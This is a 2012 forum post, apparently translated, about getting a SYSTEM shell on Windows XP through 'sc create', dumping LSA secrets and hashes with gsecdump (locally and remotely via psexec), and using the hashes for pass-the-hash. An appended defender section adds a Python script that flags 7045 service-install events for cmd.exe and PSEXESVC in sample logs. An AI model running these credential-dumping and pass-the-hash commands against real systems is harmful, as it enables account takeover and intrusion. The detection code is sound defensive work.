HASH injection attack

Original poster
Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the HASH information just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually don't need to have their passwords cracked at all; this is purely a matter of using the tool. As the original article puts it, it doesn't matter whether the password is 4 characters or 127 characters: once you have the hash, it's 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx
I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
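An added defender-side check, not part of the original post or of the quoted blog: the procedure above leaves a Service Control Manager event 7045 ("A service was installed in the system") whose Service File Name is cmd.exe, and running gsecdump through psexec -s leaves a 7045 for PsExec's own PSEXESVC service. The script parses 7045 records in Event Viewer's message format and flags both; the log text is constructed sample data and the exact field layout is an assumption.

```python
"""Flag Service Control Manager 7045 records that install an interactive
shell as a service (sc create ... cmd.exe /K start) or PsExec's PSEXESVC.
The log export below is constructed sample data, not a real capture."""
import re

# Constructed sample: three 7045 records in Event Viewer's message format.
SAMPLE_7045_LOG = """\
A service was installed in the system.
Service Name:  shellcmdline
Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start
Service Start Type:  demand start
Service Account:  LocalSystem

A service was installed in the system.
Service Name:  Spooler
Service File Name:  C:\\WINDOWS\\system32\\spoolsv.exe
Service Start Type:  auto start
Service Account:  LocalSystem

A service was installed in the system.
Service Name:  PSEXESVC
Service File Name:  C:\\WINDOWS\\PSEXESVC.exe
Service Start Type:  demand start
Service Account:  LocalSystem
"""

SHELL_BINARY = re.compile(r"\b(cmd|powershell|pwsh)\.exe\b", re.IGNORECASE)
SHELL_SWITCH = re.compile(r"\s/[KC]\b", re.IGNORECASE)  # cmd.exe /K or /C

def parse_7045(text):
    """Split the export into records and collect the 'Key:  value' fields."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = dict(re.findall(r"^(Service [\w ]+?):\s+(.*)$", block, re.M))
        if fields:
            records.append(fields)
    return records

def suspicious_services(text):
    """Return (service name, reason) for every installed service worth a look."""
    findings = []
    for rec in parse_7045(text):
        name = rec.get("Service Name", "")
        image = rec.get("Service File Name", "")
        if SHELL_BINARY.search(image) or SHELL_SWITCH.search(image):
            findings.append((name, "shell launched as a service: " + image))
        elif name.upper() == "PSEXESVC":
            findings.append((name, "PsExec remote-execution service installed"))
    return findings
```

The same rules apply unchanged to a live export of the System log; the shellcmdline service is also notable for being created, failing with 1053, and deleted within seconds.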